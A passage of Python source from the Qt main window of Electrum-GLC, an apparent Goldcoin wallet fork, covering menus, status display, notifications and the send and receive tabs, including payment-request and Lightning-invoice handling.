addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
if self.network and self.network.local_watchtower:
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Goldcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('goldcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-GLC",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Goldcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Goldcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-GLC", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-GLC", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both goldcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 GLC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The goldcoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a goldcoin address any number of times but it is not good for your privacy.'),
'\n\n',
_('For Lightning requests, payments will not be accepted after the expiration.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 0, 1, -1)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning: bool):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
except InvoiceError as e:
self.show_error(_('Error creating payment request') + ':\n' + str(e))
return
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount: int, message: str, expiration: int) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = (_("Recipient of the funds.") + "\n\n"
+ _("You may enter a Goldcoin address, a label from your list of contacts "
"(a list of completions will be proposed), "
"or an alias (email-like address that forwards to a Goldcoin address)") + ". "
+ _("Lightning invoices are also supported.") + "\n\n"
+ _("You can also pay to many outputs in a single transaction, "
"specifying one output per line.") + "\n" + _("Format: address, amount") + "\n"
+ _("To set the amount to 'max', use the '!' special character.") + "\n"
+ _("Integers weights can also be used in conjunction with '!', "
"e.g. set one amount to '2!' and another to '3!' to split your coins 40-60."))
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = (_('The amount to be received by the recipient.') + ' '
+ _('Fees are paid by the sender.') + '\n\n'
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' '
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n'
+ _('Keyboard shortcut: type "!" to send all your coins.'))
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
# show tooltip explaining max amount
mining_fee = tx.get_fee()
mining_fee_str = self.format_amount_and_units(mining_fee)
msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str)
if x_fee_amount:
twofactor_fee_str = self.format_amount_and_units(x_fee_amount)
msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str)
frozen_bal = self.get_frozen_balance_str()
if frozen_bal:
msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(frozen_bal)
QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Goldcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
